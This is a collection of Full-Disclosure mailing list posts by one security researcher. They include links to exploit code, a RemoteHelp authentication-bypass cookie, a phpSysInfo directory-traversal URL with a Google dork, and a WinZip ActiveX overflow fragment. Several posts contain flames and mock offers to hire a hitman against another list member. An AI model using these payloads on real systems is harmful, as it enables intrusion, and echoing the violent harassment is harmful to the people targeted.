Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke

[Micheal Turner]

Did you and them get your degree from the same university of trolls?

I have mistaken nothing for nothing. Fuck you. 

--- On Thu, 5/11/09, frank^2  wrote:

> From: frank^2 
> Subject: Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
> To: "Micheal Turner" 
> Cc: full-disclosure@lists.grok.org.uk
> Date: Thursday, 5 November, 2009, 12:50 AM
> On Wed, Nov 4, 2009 at 4:13 PM,
> Micheal Turner 
> wrote:
> > Its evil. Making people believe that someone is dead,
> publicly, and placing obituaries online shows no regard for
> the thoughts & feelings of the person being trolled or
> the others who may read them.
> >
> > In a community where whispers and hear-say can even
> get SANS to look for an OpenSSH 0day "doing-the-rounds",
> spreading 'misinformation' about a well-liked individual who
> worked on a project for the community is unpleasant - making
> out they are dead is just horrible.
> >
> > There are people at the end of the computers. Don't
> ever forget it.
> >
> 
> This is kind of a silly tangent to be having an argument
> about on this
> list, so I'll try to make this my last comment on the
> matter.
> 
> It may be a little semantic, but I feel you're confusing
> wickedness
> with a lack of empathy. Evil implies that the intent behind
> the prank
> was to cause emotional harm. It's certainly detestable that
> the prank
> was based in making people assume that str0ke was dead, but
> I'm
> doubtful that the purpose of its spread was to cause harm.
> I hate to
> be That Guy That Explains The Joke, but I'm pretty sure the
> purpose
> was to mock the fact that a) str0ke has been quiet for a
> long while
> publicly and b) milw0rm hasn't been updated for a lengthy
> period of
> time for yet-to-be explained reasons. (I think v3n0m piped
> in a while
> back and said they were taking care of the backlog, but
> that's about
> all I remember.)
> 
> While the line between apathy towards others' emotions and
> intent to
> truly cause harm to one's emotions can be blurred, I don't
> think it's
> particularly fair to call the perpetrators of this prank
> evil. "Evil"
> is taking joy in the suffering of others. The intent of
> trolling is to
> get a specific reaction from a crafted falsehood or
> comment-- it
> doesn't necessarily follow that the expected reaction here
> was
> emotional harm. So given the circumstances, I feel it's
> more accurate
> to say they just simply didn't care.
> 


  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke

[Micheal Turner]

Its evil. Making people believe that someone is dead, publicly, and placing 
obituaries online shows no regard for the thoughts & feelings of the person 
being trolled or the others who may read them. 

In a community where whispers and hear-say can even get SANS to look for an 
OpenSSH 0day "doing-the-rounds", spreading 'misinformation' about a well-liked 
individual who worked on a project for the community is unpleasant - making out 
they are dead is just horrible.

There are people at the end of the computers. Don't ever forget it.

--- On Wed, 4/11/09, frank^2  wrote:

> From: frank^2 
> Subject: Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
> To: "Micheal Turner" 
> Cc: full-disclosure@lists.grok.org.uk
> Date: Wednesday, 4 November, 2009, 11:08 PM
> On Wed, Nov 4, 2009 at 1:58 PM,
> Micheal Turner 
> wrote:
> > It seems the whole thing was a Hoax rumor put about by
> people who I can only describe as pure evil. Glad to know he
> is fine.
> 
> What's "pure evil" about exploiting the ease by which one
> can spread
> misinformation? If anything, it exposes how willing even a
> community
> like this is to believe a single blogpost and spread it
> around without
> truly confirming its origins.
> 
> I was trolled, I have lost. Feel free to admit it yourself
> instead of
> calling this prank "pure evil."
> 


  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke

[Micheal Turner]

It seems the whole thing was a Hoax rumor put about by people who I can only 
describe as pure evil. Glad to know he is fine. 

--- On Wed, 4/11/09, webDEViL  wrote:

> From: webDEViL 
> Subject: Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
> To: "Micheal Turner" 
> Cc: full-disclosure@lists.grok.org.uk
> Date: Wednesday, 4 November, 2009, 1:39 PM
> A very sad news indeed.
> 
>  
> On Wed, Nov 4, 2009 at 6:49 PM,
> Micheal Turner 
> wrote:
> 
> We are
> mourning a good friend today. I first begun talking to
> str0ke when I started publishing exploit codes onto this
> mailing list, he would always be polite and friendly in his
> emails. I got to know him over the years and am saddened by
> his departure, he contributed to the exploit scene and
> hacking subculture in a huge way. The last time I talked
> with him I asked him if I could interview him for my blog,
> he laughed and said he should be interviewing the exploit
> writers since he didnt do anything. That was str0ke and
> str0ke did alot, he always fought for the rights of the
> exploit developers and his website was the bread and butter
> of many a hackers day. He will sadly be missed by many
> people, hackers & friends.
> 
> 
> 
> At least now we can post exploits without that damn // milw0rm.com comment 
> being
> added to the end!!! ;-) I joke, this code is dedicated to
> you str0ke. R.I.P my friend.
> 
> 
> 
> http://www.hackerfantastic.com/archive/exploits/prdelka-vs-APPLE-ptracepanic.c
> 
> 
> 
> 
> 
> ___
> 
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 
> 


  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke

[Micheal Turner]

We are mourning a good friend today. I first begun talking to str0ke when I 
started publishing exploit codes onto this mailing list, he would always be 
polite and friendly in his emails. I got to know him over the years and am 
saddened by his departure, he contributed to the exploit scene and hacking 
subculture in a huge way. The last time I talked with him I asked him if I 
could interview him for my blog, he laughed and said he should be interviewing 
the exploit writers since he didnt do anything. That was str0ke and str0ke did 
alot, he always fought for the rights of the exploit developers and his website 
was the bread and butter of many a hackers day. He will sadly be missed by many 
people, hackers & friends.


At least now we can post exploits without that damn // milw0rm.com comment 
being added to the end!!! ;-) I joke, this code is dedicated to you str0ke. 
R.I.P my friend.


http://www.hackerfantastic.com/archive/exploits/prdelka-vs-APPLE-ptracepanic.c



  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Another one hit send today.

[Micheal Turner]

Another one hit send today, it's all over my inbox. "Idiots on Internet ranting 
nonsense", "Opinions like assholes, everyone has one"...
Damn FD'ers.  They're all alike.

[...]

I realized something today, in the last few months I have read FD twice, and 
each time I have left without enlightenment. The daily trollings of n3td3v and 
flame responses which we have all been guilty of have caused the list to 
degenerate completely in usefulness. The most interesting posts are often 
mirrored on other lists such as BugTraq and technical discussion is lately best 
held on the likes of DailyDave. 

I call upon Full-Disclosure to fix up, man up and resolve this problem for 
good. Ignore n3td3v. Do not reply to his postings. Ignore his replies to your 
postings. Do not give comment or weight to any arguement or viewpoint that he 
may hold. This single act of solidarity by all users of FD could (in time) help 
repair the damage already caused by this single or group of individual(s).

n3td3v can be credited for achieving one thing in the field of computer 
security. Completely destroying one of the main outlets used by individuals who 
believe in full disclosure of issues pertaining to computer security. Perhaps 
this was a deliberate attack or just a mental patient with a day pass out to a 
cybercafe. 

The time for action is now. Let us have our Ides of March this year.

 -- prdelka



  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SECNAP IS CRAP

[Micheal Turner]

--- reepex <[EMAIL PROTECTED]> wrote:

> why are companies like this allowed to exist? Their
> employee ( Bob McGuire,
> Director ) openly admits ( see previously emails
> with Robert, DonB, and I )
> that his company participates in FUD and scare
> tactics.  They have no
> apparent talent and use 'vulnerability scanners' and
> 'security tools' and
> divert our conversation from their POS business to
> how to help protect
> against spam.
> 
> Secnap should be blacklisted and its employees
> should be ridiculed on sight.
> > ___
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
http://secunia.com/

why are you hating on them? thought you'd be glad to
have some new friends, after all - sounds like you
have quite a bit in common!



  __
Sent from Yahoo! Mail.
A Smarter Email http://uk.docs.yahoo.com/nowyoucan.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] n3td3v agenda & Solid Information Security State Release 0012a

[Micheal Turner]

  n3td3v agenda & Cyber Security group
  

 Solid Information Security State Release #0012a

MARKING: RESTRICTIONS APPLY.
FAO: WORLD LEADERS

== Introduction ==
Serious high-risk ultra critical vulnerability has
been identified in Remote Help application that maybe
used by CIA, NSA and FBI employees when helping
colleagues on anti-terror campaigns.RemoteHelp is a
minimal http server that allows to view and control a
remote pc running a 32-bits version of Microsoft
Windows.
current version is 0.0.6 and runs stand-alone or
installs as a service.

== URL ==
http://sourceforge.net/projects/remotehelp/ 

== HISTORY ==
After n3td3v agenda emailed the NSA, SANS and all
information security groups and was found not to be
taken seriously. High risk proof of concept exploit
code has been authored for severe vulnerability in
Remote Help application which maybe used by any number
of Yahoo!, Google!, Ebay! or NSA employees. This
vulnerability gives rise to serious national
infrastructure risk and should not be under estimated!

== Proof of Concept ==
I found a vulnerability in the pages.c file which
generates the login page dialog and authenticates a
user after it checks if your "user" and "pass"
parameter match the defaults
(user/default) it does this:

   strncpy(cookie,"user=default; path=/; expires=Sun,
11-May-2030 22:11:40 GMT",1024);

for a valid login and for an invalid login it sets an
expired cookie like so;
   strncpy(cookie,"user=default; path=/; expires=Sun,
11-May-1970 22:11:40 GMT",1024);

all you have to do is add "Cookie: user=default;
path=/; expires=Sun, 11-May-2030 22:11:40 GMT" to your
HTTP request and you can bypass
authentication to the Remote Help server and access
the filesystem/exec commands/view the webcam of the
hosts running it.

== Credit ==

n3td3v & documentation help by Michael Turner.

"Never trust your employees."


  ___ 
Yahoo! For Good helps you make a difference  

http://uk.promotions.yahoo.com/forgood/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] sans handler gives out n3td3v e-mail to public

[Micheal Turner]

Once upon a time in toy town, I offered to contract
the services of a professional hit-man to have n3td3v
executed - in part a joke, my black humour. However, I
have received so many donations from various gmail.com
addresses that I have just been able to purchase my
first car with the left-over change. As I type this
from my Lamborghini Diablo parked up in a car park at
London's heathrow eagerly awaiting the arrival of
"Aghbad", a delightful eastern european chap with a
pretty impressive handlebar mustache which matches the
colour of the AK-47 i believe has been paid to come
off before the concourse, i can't help but realize
just HOW MANY of the SANS people paid their donations
to this worthwhile cause. I also wonder if n3td3v
thought the CIA would allow him to continue his
campaign of hate.

Maybe the FUD will stop and we can all get on with
whatever we were doing before the n3td3v agenda. 

--- n3td3v <[EMAIL PROTECTED]> wrote:

> On Mon, Mar 31, 2008 at 4:00 AM, 
> <[EMAIL PROTECTED]> wrote:
> > On Sat, 29 Mar 2008 17:08:43 -, n3td3v said:
> >
> >  > Why are they announcing podcasts when both Joel
> Esler and Johannes
> >  > Ullrich have a privacy breach still to
> publically acknowledge and
> >  > apologize for?
> >
> >  Umm.. maybe because, despite what you may think,
> your little pissing contest
> >  with Joel and Johannes doesn't qualify as a "oh
> my ghod, let's drop *everything*
> >  and shut down the entire workflow and not do a
> single damned thing until this
> >  issue is resolved".
> 
> They aren't busy or getting on with business, they
> have obviously
> snubbed the n3td3v agenda.
> 
> Joel Esler is back on duty,
> http://isc.sans.org/diary.html?storyid=4225 he
> obviously hasn't been
> sacked and he is talking about April Fools Day.
> 
> I'm mighty angry,
> 
> n3td3v
> 
> ___
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
> 



  __
Sent from Yahoo! Mail.
A Smarter Inbox http://uk.docs.yahoo.com/nowyoucan.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] old junk

[Micheal Turner]

old junk from 2007. roll on 2008! cb payload busted in
rshd exploit. enjoy.

http://rapidshare.com/files/85400481/prdelka-vs-GNU-citadel.tar.gz.html
http://rapidshare.com/files/85400619/prdelka-vs-MS-rshd.tar.gz.html


  __
Sent from Yahoo! Mail - a smarter inbox http://uk.mail.yahoo.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] mbsebbs 0.70.0 & below local root exploit

[Micheal Turner]

https://prdelka.blackart.org.uk/exploitz/prdelka-vs-GNU-mbsebbs.c

sux, fixes available.



___ 
The all-new Yahoo! Mail goes wherever you go - free your email address from 
your Internet provider. http://uk.docs.yahoo.com/nowyoucan.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability

[Micheal Turner]

here we go, enjoy! 

https://prdelka.blackart.org.uk/exploitz/prdelka-vs-MS-winzip.c

--- Micheal Turner <[EMAIL PROTECTED]> wrote:

> 7245 correctly resolves this issue; standard stack
> overflow in WZFILEVIEW.FilePattern snatching EIP;
> PoC
> below;
> 
> 
> 
> 
> 
> 
> 
> <!--
> Sub WZFILEVIEW_OnAfterItemAdd(Item)
> WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"
> end sub
> -->
> 
> 
CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
> 
> 
> 
> 
> 
> -- prdelka
> 
> 
> 
>   
>   
>   
>
___
> 
> All new Yahoo! Mail "The new Interface is stunning
> in its simplicity and ease of use." - PC Magazine 
> http://uk.docs.yahoo.com/nowyoucan.html
> 
> ___
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
> 


Send instant messages to your online friends http://uk.messenger.yahoo.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability

[Micheal Turner]

7245 correctly resolves this issue; standard stack
overflow in WZFILEVIEW.FilePattern snatching EIP; PoC
below;















-- prdelka






___ 
All new Yahoo! Mail "The new Interface is stunning in its simplicity and ease 
of use." - PC Magazine 
http://uk.docs.yahoo.com/nowyoucan.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] prdelka.blackart.org.uk

[Micheal Turner]

some exploits (resolved by vendors, apply your fixes).

https://prdelka.blackart.org.uk/exploitz/prdelka-vs-AEP-smartgate.c
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-CISCO-vpnftp.c
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-HPUX-libc.c
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-HPUX-swask.c
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-HPUX-swmodify.c
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-HPUX-swpackage.c

https://prdelka.blackart.org.uk/sh3lLc0de/linux_tolower_remote.S

check out the other directories for misc toolz, junk &
bl0g

:)





___ 
All new Yahoo! Mail "The new Interface is stunning in its simplicity and ease 
of use." - PC Magazine 
http://uk.docs.yahoo.com/nowyoucan.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] n3td3v malware removal tool

[Micheal Turner]

I have spent a large amount of time trying to
configure my filters to prune my email of the daily
crap (largely due to n3td3v’s inane rants). However,
this morning I was stunned to see him waffling on
(again) about the “big evil corporations” and their
monopoly on security. News flash n3td3v, we do not
care that Yahoo! employees are stealing company milk
from the coffee room. I’ve tried to put up with him,
I’ve tried to ignore him, have patiently waited for
him to post at least some XSS vulnerability. The time
has come to remove n3td3v. I have contacted the
services of a Hit man through forums directly related
to former shadow-crew and notorious online criminal
gangs (www.darkmarket.ws www.talkcash.net
www.cardersmarket.com). I have been given a quotation
for both overseas and local work from a number of
different individuals. I am currently trying to raise
the $15,000 required for the success of this
operation. At the bottom of
http://prdelka.blackart.org.uk you will find a Paypal
donate button – should anyone at F-Secure, Symantec,
Yahoo!, Google or indeed any of the wider security
community wish to donate to help push for the silence
– then your donations will be thankfully accepted. A
GPG key has been attached to this email, please use it
if you wish to engage me in discussion any further in
this matter.

Do the right thing. Let God sort him out.




___ 
Does your mail provider give you FREE antivirus protection? 
Get Yahoo! Mail http://uk.mail.yahoo.com

prdelka.asc
Description: 1401581105-prdelka.asc
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability

[Micheal Turner]

Exploit has been attached as problems with site
hosting over weekend.

--- Micheal Turner <[EMAIL PROTECTED]> wrote:

>
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c
> 
> --- labs-no-reply <[EMAIL PROTECTED]>
> wrote:
> 
> > Sun Microsystems Solaris sysinfo() Kernel Memory
> > Disclosure Vulnerability
> > 
> > iDefense Security Advisory 07.20.06
> >
>
http://www.idefense.com/application/poi/display?type=vulnerabilities
> > July 20, 2006
> > 
> > I. BACKGROUND
> > 
> > Solaris is a UNIX operating system developed by
> Sun
> > Microsystems.
> > 
> > II. DESCRIPTION
> > 
> > Local exploitation of an integer overflow
> > vulnerability in Sun
> > Microsystems Inc. Solaris allows attackers to read
> > kernel memory from a
> > non-privileged userspace process.
> > 
> > The vulnerability specifically exists due to an
> > integer overflow in
> > /usr/src/uts/common/syscall/systeminfo.c. The
> > vulnerable code is as
> > follows:
> > 
> > 125 if (kstr != NULL) {
> > 126 if ((strcnt = strlen(kstr)) >= count)
> {
> > 127 getcnt = count - 1;
> > 128 if (subyte(buf + count - 1, 0) <
> 0)
> > 129 return (set_errno(EFAULT));
> > 130 } else
> > 131 getcnt = strcnt + 1;
> > 132 if (copyout(kstr, buf, getcnt))
> > 133 return (set_errno(EFAULT));
> > 134 return (strcnt + 1);
> > 135 }
> > 
> > 
> > If the variable count (which is a value provided
> by
> > the user invoking
> > the function) is 0, the function will call the
> > copyout function with a
> > length argument of -1. Because copyout interprets
> > the length argument as
> > an unsigned integer, a large amount of data will
> be
> > copied out to
> > userspace, well beyond the boundaries that are
> > intended.
> > 
> > III. ANALYSIS
> > 
> > Successful exploitation of this vulnerability
> allows
> > attackers to read
> > sensitive kernel memory. This can lead to the
> > compromise of passwords or
> > keys. It can also aid an attacker in gathering
> > information for
> > exploitation of other kernel level
> vulnerabilities.
> > 
> > IV. DETECTION
> > 
> > iDefense has confirmed that Solaris 10 is
> > vulnerable. Earlier versions
> > of Solaris are not affected.
> > 
> > V. WORKAROUND
> > 
> > iDefense is currently unaware of any workaround
> for
> > this issue.
> > 
> > VI. VENDOR RESPONSE
> > 
> > Sun Alert ID 102343 addresses this issue and is
> > available at:
> > 
> >
> >
>
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102343-1
> > 
> > VII. CVE INFORMATION
> > 
> > A Mitre Corp. Common Vulnerabilities and Exposures
> > (CVE) number has not
> > been assigned yet.
> > 
> > VIII. DISCLOSURE TIMELINE
> > 
> > 12/15/2005  Initial vendor notification
> > 12/15/2005  Initial vendor response
> > 07/20/2006  Coordinated public disclosure
> > 
> > IX. CREDIT
> > 
> > The discoverer of this vulnerability wishes to
> > remain anonymous.
> > 
> > Get paid for vulnerability research
> > http://www.idefense.com/poi/teams/vcp.jsp
> > 
> > Free tools, research and upcoming events
> > http://labs.idefense.com
> > 
> > X. LEGAL NOTICES
> > 
> > Copyright © 2006 iDefense, Inc.
> > 
> > Permission is granted for the redistribution of
> this
> > alert
> > electronically. It may not be edited in any way
> > without the express
> > written consent of iDEFENSE. If you wish to
> reprint
> > the whole or any
> > part of this alert in any other medium other than
> > electronically, please
> > email [EMAIL PROTECTED] for permission.
> > 
> > Disclaimer: The information in the advisory is
> > believed to be accurate
> > at the time of publishing based on currently
> > available information. Use
> > of the information constitutes acceptance for use
> in
> > an AS IS condition.
> > There are no warranties with regard to this
> > information. Neither the
> > author nor the publisher accepts any liability for
> > any direct, indirect,
> > or consequential loss or damage arising from use
> of,
> > or reliance on,
> > this information.
> > 
> > ___
> > Full-Disclos

Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability

[Micheal Turner]

http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c

--- labs-no-reply <[EMAIL PROTECTED]> wrote:

> Sun Microsystems Solaris sysinfo() Kernel Memory
> Disclosure Vulnerability
> 
> iDefense Security Advisory 07.20.06
>
http://www.idefense.com/application/poi/display?type=vulnerabilities
> July 20, 2006
> 
> I. BACKGROUND
> 
> Solaris is a UNIX operating system developed by Sun
> Microsystems.
> 
> II. DESCRIPTION
> 
> Local exploitation of an integer overflow
> vulnerability in Sun
> Microsystems Inc. Solaris allows attackers to read
> kernel memory from a
> non-privileged userspace process.
> 
> The vulnerability specifically exists due to an
> integer overflow in
> /usr/src/uts/common/syscall/systeminfo.c. The
> vulnerable code is as
> follows:
> 
> 125 if (kstr != NULL) {
> 126 if ((strcnt = strlen(kstr)) >= count) {
> 127 getcnt = count - 1;
> 128 if (subyte(buf + count - 1, 0) < 0)
> 129 return (set_errno(EFAULT));
> 130 } else
> 131 getcnt = strcnt + 1;
> 132 if (copyout(kstr, buf, getcnt))
> 133 return (set_errno(EFAULT));
> 134 return (strcnt + 1);
> 135 }
> 
> 
> If the variable count (which is a value provided by
> the user invoking
> the function) is 0, the function will call the
> copyout function with a
> length argument of -1. Because copyout interprets
> the length argument as
> an unsigned integer, a large amount of data will be
> copied out to
> userspace, well beyond the boundaries that are
> intended.
> 
> III. ANALYSIS
> 
> Successful exploitation of this vulnerability allows
> attackers to read
> sensitive kernel memory. This can lead to the
> compromise of passwords or
> keys. It can also aid an attacker in gathering
> information for
> exploitation of other kernel level vulnerabilities.
> 
> IV. DETECTION
> 
> iDefense has confirmed that Solaris 10 is
> vulnerable. Earlier versions
> of Solaris are not affected.
> 
> V. WORKAROUND
> 
> iDefense is currently unaware of any workaround for
> this issue.
> 
> VI. VENDOR RESPONSE
> 
> Sun Alert ID 102343 addresses this issue and is
> available at:
> 
>
>
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102343-1
> 
> VII. CVE INFORMATION
> 
> A Mitre Corp. Common Vulnerabilities and Exposures
> (CVE) number has not
> been assigned yet.
> 
> VIII. DISCLOSURE TIMELINE
> 
> 12/15/2005  Initial vendor notification
> 12/15/2005  Initial vendor response
> 07/20/2006  Coordinated public disclosure
> 
> IX. CREDIT
> 
> The discoverer of this vulnerability wishes to
> remain anonymous.
> 
> Get paid for vulnerability research
> http://www.idefense.com/poi/teams/vcp.jsp
> 
> Free tools, research and upcoming events
> http://labs.idefense.com
> 
> X. LEGAL NOTICES
> 
> Copyright © 2006 iDefense, Inc.
> 
> Permission is granted for the redistribution of this
> alert
> electronically. It may not be edited in any way
> without the express
> written consent of iDEFENSE. If you wish to reprint
> the whole or any
> part of this alert in any other medium other than
> electronically, please
> email [EMAIL PROTECTED] for permission.
> 
> Disclaimer: The information in the advisory is
> believed to be accurate
> at the time of publishing based on currently
> available information. Use
> of the information constitutes acceptance for use in
> an AS IS condition.
> There are no warranties with regard to this
> information. Neither the
> author nor the publisher accepts any liability for
> any direct, indirect,
> or consequential loss or damage arising from use of,
> or reliance on,
> this information.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
> 




___ 
The all-new Yahoo! Mail goes wherever you go - free your email address from 
your Internet provider. http://uk.docs.yahoo.com/nowyoucan.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] phpSysInfo arbitrary file identification

[Micheal Turner]

Tested 2.5.1

--- Micheal Turner <[EMAIL PROTECTED]> wrote:

> phpSysInfo is a popular webscript for displaying
> stats
> about a webserver available from
> http://phpsysinfo.sourceforge.net/ with 365012
> downloads to date. A vulnerability which allows an
> attacker to identify if a file exists on the remote
> system has been identified. By supplying a directory
> traversal string to lng= in a POST or  GET request
> to
> index.php with a poison null byte terminating %00
> allows an attacker to determine if any file exists.
> The vulnerable function is shown.
> 
>  
>   if (!file_exists(APP_ROOT . '/includes/lang/' .
> $lng
> . '.php')) {
>  
> 
> An attacker can determine if the file exists by
> studying the returned error message, valid files
> return the string “Sorry, we don't support this
> language.” and invalid files return the normal
> phpSysInfo application page. 
> 
> 
> Example.
>
www.somesite.com/phpSysInfo/index.php?template=blue&lng=../../../../../../../../../../../var/log/httpd-error.log%00
> 
> Humour.
>
http://www.google.co.uk/search?hl=en&safe=off&client=firefox-a&rls=org.mozilla%3Aen-GB%3Aofficial&q=%22System+Information%22+phpSysInfo+site%3A.edu&btnG=Search&meta=
> 
> 
>   
>
___
> 
> Inbox full of spam? Get leading spam protection and
> 1GB storage with All New Yahoo! Mail.
> http://uk.docs.yahoo.com/nowyoucan.html
> 
> ___
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
> 






___ 
"My Verdict: The new Yahoo! Mail is far superior..."  – The Wall Street Journal.
http://uk.docs.yahoo.com/nowyoucan.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] phpSysInfo arbitrary file identification

[Micheal Turner]

phpSysInfo is a popular webscript for displaying stats
about a webserver available from
http://phpsysinfo.sourceforge.net/ with 365012
downloads to date. A vulnerability which allows an
attacker to identify if a file exists on the remote
system has been identified. By supplying a directory
traversal string to lng= in a POST or  GET request to
index.php with a poison null byte terminating %00
allows an attacker to determine if any file exists.
The vulnerable function is shown.

 
  if (!file_exists(APP_ROOT . '/includes/lang/' . $lng
. '.php')) {
 

An attacker can determine if the file exists by
studying the returned error message, valid files
return the string “Sorry, we don't support this
language.” and invalid files return the normal
phpSysInfo application page. 


Example.
www.somesite.com/phpSysInfo/index.php?template=blue&lng=../../../../../../../../../../../var/log/httpd-error.log%00

Humour.
http://www.google.co.uk/search?hl=en&safe=off&client=firefox-a&rls=org.mozilla%3Aen-GB%3Aofficial&q=%22System+Information%22+phpSysInfo+site%3A.edu&btnG=Search&meta=



___ 
Inbox full of spam? Get leading spam protection and 1GB storage with All New 
Yahoo! Mail. http://uk.docs.yahoo.com/nowyoucan.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] The Stakkato Intrusions

[Micheal Turner]

The Stakkato intrusions were labeled as long standing
attacks against supercomputer centres and ultimately
resulted in the theft of IOS source code.
A technical paper has been released by one of the
affected sites detailing how they caught stakkato.

http://www.nsc.liu.se/~nixon/stakkato.pdf

If you liked this you may also be intrested in this
from one of the affected super computer centres

http://www.usenix.org/publications/login/2005-02/pdfs/fate.pdf


Send instant messages to your online friends http://uk.messenger.yahoo.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Shell accounts

[Micheal Turner]

You have no privacy anymore, get over it.


Send instant messages to your online friends http://uk.messenger.yahoo.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] INFIGO-2006-03-01 exploit

[Micheal Turner]

http://prdelka.blackart.org.uk/exploitz/prdelka-vs-GNU-peercast.c



___ 
NEW Yahoo! Cars - sell your car and browse thousands of new and used cars 
online! http://uk.cars.yahoo.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iDefense Security Advisory 02.24.06: SCO Unixware Setuid ptrace Local Privilege Escalation Vulnerability

[Micheal Turner]

http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SCO-ptrace.c



___ 
Win a BlackBerry device from O2 with Yahoo!. Enter now. 
http://www.yahoo.co.uk/blackberry
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] update on the linux worm

[Micheal Turner]

Could you clarify what vulnerabilities are being
exploited in the PHP applications ? 

--- Gadi Evron <[EMAIL PROTECTED]> wrote:

> A quick digest of some updates from the last few
> hours on this issue:
> 
> 1. The worm is based on 'kaiten', which has been
> going around in 
> different variants for a long time now.
> 
> 2. This worm is new.
> 
> 3. The first part exploits PHP applications, like
> these variants 
> normally do.
> 
> 4. The second part spreads to other systems.
> 
> 5. The worm connects to a botnet C&C based on two
> Fast-flux DNS RR's 
> which are not there anymore, and as they change, are
> taken down.
> 
> As always, more updates if necessary on:
> http://blog.securiteam.com
> 
> Thanks,
> 
>   Gadi.
> 
> -- 
> http://blogs.securiteam.com/
> 
> "Out of the box is where I live".
>   -- Cara "Starbuck" Thrace, Battlestar Galactica.
> ___
> Full-Disclosure - We believe in it.
> Charter:
>
